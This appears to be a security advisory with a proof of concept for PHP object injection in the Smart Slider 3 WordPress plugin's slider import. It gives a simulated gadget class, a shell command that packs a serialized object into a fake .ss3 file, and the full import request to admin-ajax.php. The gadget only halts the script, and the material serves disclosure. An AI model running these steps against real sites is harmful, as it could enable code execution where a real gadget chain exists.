The plugin unserialises the content of an imported file, which could lead to PHP object injection issues when a user import (intentionally or not) a malicious file, and a suitable gadget chain is present on the site.
To simulate a gadget chain, put the following code in a plugin
class Evil {
public function __wakeup() : void {
die("Arbitrary deserialization");
}
}
Create a fake slider:
echo 'O:4:"Evil":0:{};' > data && zip EvilSlider.ss3 data
And import the fake slider in the Smart Slider 3 dashboard.
POST /wp-admin/admin-ajax.php?action=smart-slider3&nextendcontroller=sliders&nextendaction=import&groupID=0&nextend_nonce=e771567d65 HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=---------------------------304866225113075420131015772767
Content-Length: 1416
Cookie:[admin+]
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="nextend_nonce"
e771567d65
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[upload_or_local]"
0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[import-file]"; filename="My project(2).ss3"
Content-Type: application/octet-stream
[File data]
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="selectslider[local-import-file]"
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[local-import-file]"
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[delete]"
0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[restore]"
0
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="selectslider[image-mode]"
clone
-----------------------------304866225113075420131015772767
Content-Disposition: form-data; name="slider[image-mode]"
clone
-----------------------------304866225113075420131015772767--